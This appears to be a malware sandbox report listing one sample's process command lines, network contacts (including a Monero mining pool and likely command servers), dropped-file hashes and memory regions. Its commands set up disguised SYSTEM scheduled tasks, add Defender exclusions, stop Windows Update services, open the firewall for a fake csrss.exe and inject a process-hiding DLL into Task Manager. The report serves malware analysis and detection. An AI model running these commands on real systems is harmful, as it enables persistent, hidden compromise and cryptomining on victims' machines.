C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Network

Country Destination Domain Proto
US 93.184.221.240:80 tcp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 80.74.9.45.in-addr.arpa udp
NL 45.66.230.149:80 45.66.230.149 tcp
US 13.89.179.9:443 tcp
US 8.8.8.8:53 149.230.66.45.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 8.8.8.8:53 rcn.tuktuk.ug udp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
US 8.8.8.8:53 host-file-host6.com udp
N/A 194.50.153.68:80 host-file-host6.com tcp
US 8.8.8.8:53 4.3.209.85.in-addr.arpa udp
US 8.8.8.8:53 host-host-file8.com udp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
US 8.8.8.8:53 68.153.50.194.in-addr.arpa udp
NL 45.12.253.56:80 45.12.253.56 tcp
US 8.8.8.8:53 56.253.12.45.in-addr.arpa udp
GB 96.16.110.41:443 tcp
US 93.184.221.240:80 tcp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 d238f108-5235-4880-a175-a916ef0d018b.uuid.duniadekho.bar udp
US 8.8.8.8:53 161.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 server6.duniadekho.bar udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun2.l.google.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
BG 185.82.216.50:443 server6.duniadekho.bar tcp
IN 172.253.121.127:19302 stun2.l.google.com udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 127.121.253.172.in-addr.arpa udp
US 8.8.8.8:53 luckytradeone.com udp
US 172.67.181.198:443 luckytradeone.com tcp
US 8.8.8.8:53 50.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 198.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe

MD5 2d257873ee0ae75c9b89bd340e3e3da6
SHA1 9dd9080df32b375f39df6470136a5bb107829eba
SHA256 f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
SHA512 e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753

C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe

MD5 2d257873ee0ae75c9b89bd340e3e3da6
SHA1 9dd9080df32b375f39df6470136a5bb107829eba
SHA256 f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
SHA512 e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753

C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe

MD5 2d257873ee0ae75c9b89bd340e3e3da6
SHA1 9dd9080df32b375f39df6470136a5bb107829eba
SHA256 f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
SHA512 e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753

memory/2772-162-0x00000000018D0000-0x00000000018F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 8670305fdaf49dc2fd18804bc8000bd2
SHA1 a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256 f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA512 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 8670305fdaf49dc2fd18804bc8000bd2
SHA1 a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256 f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA512 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 8670305fdaf49dc2fd18804bc8000bd2
SHA1 a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256 f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA512 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1

memory/2772-179-0x0000000001900000-0x0000000001940000-memory.dmp

memory/3748-180-0x0000000000E50000-0x0000000000F0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

memory/3748-192-0x00000000058E0000-0x000000000597C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

MD5 e858e636547aa1dff328554f5750cb37
SHA1 a96483d7314414755ae9f89e389843ae35d3fece
SHA256 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
SHA512 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

memory/1020-219-0x0000000001820000-0x0000000001835000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

MD5 e858e636547aa1dff328554f5750cb37
SHA1 a96483d7314414755ae9f89e389843ae35d3fece
SHA256 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
SHA512 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

MD5 e858e636547aa1dff328554f5750cb37
SHA1 a96483d7314414755ae9f89e389843ae35d3fece
SHA256 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
SHA512 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 8670305fdaf49dc2fd18804bc8000bd2
SHA1 a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256 f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA512 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1

memory/4500-224-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1020-226-0x0000000001840000-0x0000000001849000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

MD5 e858e636547aa1dff328554f5750cb37
SHA1 a96483d7314414755ae9f89e389843ae35d3fece
SHA256 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
SHA512 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

memory/4500-236-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/2636-246-0x00007FFE58630000-0x00007FFE58632000-memory.dmp

memory/2636-247-0x00007FFE58640000-0x00007FFE58642000-memory.dmp

memory/2636-250-0x00007FFE583F0000-0x00007FFE583F2000-memory.dmp

memory/2636-259-0x00007FFE55E30000-0x00007FFE55E32000-memory.dmp

memory/2200-258-0x0000000002860000-0x0000000002C58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/2636-254-0x00007FFE55E20000-0x00007FFE55E22000-memory.dmp

memory/2636-253-0x00007FFE58400000-0x00007FFE58402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/2636-260-0x00007FF774FE0000-0x00007FF7767A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 8670305fdaf49dc2fd18804bc8000bd2
SHA1 a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256 f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA512 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1

memory/3172-266-0x00000000025F0000-0x0000000002606000-memory.dmp

memory/4500-268-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

memory/2772-279-0x0000000000400000-0x00000000017FB000-memory.dmp

memory/1284-288-0x00007FF774FE0000-0x00007FF7767A9000-memory.dmp

memory/2200-289-0x0000000002D60000-0x000000000364B000-memory.dmp

memory/2940-293-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/3748-291-0x0000000005AB0000-0x0000000005AC0000-memory.dmp

memory/2940-294-0x0000000004D70000-0x0000000004D85000-memory.dmp

memory/2940-296-0x0000000004D70000-0x0000000004D85000-memory.dmp

memory/2940-301-0x0000000004D70000-0x0000000004D85000-memory.dmp

memory/2940-305-0x0000000004D70000-0x0000000004D85000-memory.dmp

memory/2200-298-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2940-309-0x0000000004D70000-0x0000000004D85000-memory.dmp

memory/2940-313-0x0000000004D70000-0x0000000004D85000-memory.dmp

memory/2940-319-0x0000000004D70000-0x0000000004D85000-memory.dmp

memory/2940-325-0x0000000004D70000-0x0000000004D85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/3048-358-0x0000000000400000-0x0000000000426000-memory.dmp

memory/4768-363-0x0000000005B50000-0x0000000005B60000-memory.dmp

memory/3748-361-0x00000000032E0000-0x00000000032E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\updEdge.exe.log

MD5 8334a471a4b492ece225b471b8ad2fc8
SHA1 1cb24640f32d23e8f7800bd0511b7b9c3011d992
SHA256 5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169
SHA512 56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

memory/2072-368-0x0000000005870000-0x0000000005E88000-memory.dmp

memory/2072-371-0x00000000052D0000-0x00000000052E2000-memory.dmp

memory/2072-374-0x0000000005400000-0x000000000550A000-memory.dmp

memory/3172-386-0x0000000008360000-0x0000000008370000-memory.dmp

memory/2072-393-0x0000000005370000-0x0000000005380000-memory.dmp

memory/3048-390-0x0000000005540000-0x0000000005550000-memory.dmp

memory/3048-387-0x0000000005210000-0x000000000524C000-memory.dmp

memory/3172-411-0x0000000008620000-0x0000000008630000-memory.dmp

memory/3172-409-0x0000000008620000-0x0000000008630000-memory.dmp

memory/4768-412-0x00000000032E0000-0x00000000032E1000-memory.dmp

memory/2768-416-0x00000000056A0000-0x00000000056B0000-memory.dmp

memory/3048-417-0x00000000055C0000-0x0000000005626000-memory.dmp

memory/2200-419-0x0000000002D60000-0x000000000364B000-memory.dmp

memory/2072-420-0x0000000006230000-0x00000000062C2000-memory.dmp

memory/2072-421-0x0000000006880000-0x0000000006E24000-memory.dmp

memory/2072-422-0x0000000006350000-0x00000000063C6000-memory.dmp

memory/2072-423-0x00000000065A0000-0x0000000006762000-memory.dmp

memory/2072-425-0x0000000007360000-0x000000000788C000-memory.dmp

memory/2072-426-0x0000000006490000-0x00000000064AE000-memory.dmp

memory/1388-429-0x0000000004E60000-0x0000000004E96000-memory.dmp

memory/1388-431-0x0000000005530000-0x0000000005B58000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

MD5 67345b374ece01694478cd821081caf8
SHA1 04b3bacfe792cfaffb935ecd2b80813b3306b67b
SHA256 5a4a3f6ae9d338ce1639c47779eca19a0e827445e529d6fcf7753e670bf8b4f1
SHA512 fe0c99e9731d3601e701e2bb7c8e542654447822a61c251e0124a1b9643f6264600f45ca8010c6150c9cef6903321f3769fa77008334f7a3c92e0026f83d6853

memory/1388-432-0x0000000005CA0000-0x0000000005CC2000-memory.dmp

memory/2072-434-0x0000000005370000-0x0000000005380000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ie0elnb3.3rm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3172-440-0x0000000008620000-0x0000000008630000-memory.dmp

memory/1388-441-0x0000000004EF0000-0x0000000004F00000-memory.dmp

memory/1388-446-0x0000000005E80000-0x0000000005EE6000-memory.dmp

memory/1388-447-0x0000000006440000-0x000000000645E000-memory.dmp

memory/3172-448-0x0000000008620000-0x0000000008630000-memory.dmp

memory/3172-449-0x0000000008620000-0x0000000008630000-memory.dmp

memory/1388-450-0x0000000006990000-0x00000000069D4000-memory.dmp

memory/1388-451-0x0000000004EF0000-0x0000000004F00000-memory.dmp

memory/1388-452-0x0000000007E60000-0x00000000084DA000-memory.dmp

memory/4508-454-0x00000153F2A50000-0x00000153F2A72000-memory.dmp

memory/1388-453-0x0000000007800000-0x000000000781A000-memory.dmp

memory/4508-456-0x00000153F2C40000-0x00000153F2C50000-memory.dmp

memory/4508-455-0x00000153F2C40000-0x00000153F2C50000-memory.dmp

memory/4508-467-0x00000153F2C40000-0x00000153F2C50000-memory.dmp

memory/4508-466-0x00000153F2C40000-0x00000153F2C50000-memory.dmp

memory/1388-470-0x00000000079B0000-0x00000000079E2000-memory.dmp

memory/1388-471-0x0000000073850000-0x000000007389C000-memory.dmp

memory/1388-472-0x000000006E880000-0x000000006EBD4000-memory.dmp

memory/1388-482-0x0000000007990000-0x00000000079AE000-memory.dmp

memory/1388-484-0x0000000007AE0000-0x0000000007AEA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1388-486-0x000000007FBB0000-0x000000007FBC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

memory/1388-497-0x0000000007BA0000-0x0000000007C36000-memory.dmp

memory/1124-498-0x000001EF9A050000-0x000001EF9A060000-memory.dmp

memory/1124-499-0x000001EF9A050000-0x000001EF9A060000-memory.dmp

memory/1124-500-0x000001EF9A050000-0x000001EF9A060000-memory.dmp

memory/1388-501-0x0000000007B40000-0x0000000007B4E000-memory.dmp

memory/1124-503-0x000001EF9A050000-0x000001EF9A060000-memory.dmp

memory/1388-510-0x0000000007C40000-0x0000000007C5A000-memory.dmp

memory/1388-514-0x0000000007B90000-0x0000000007B98000-memory.dmp

memory/4220-520-0x0000020A1CCC0000-0x0000020A1CCD0000-memory.dmp

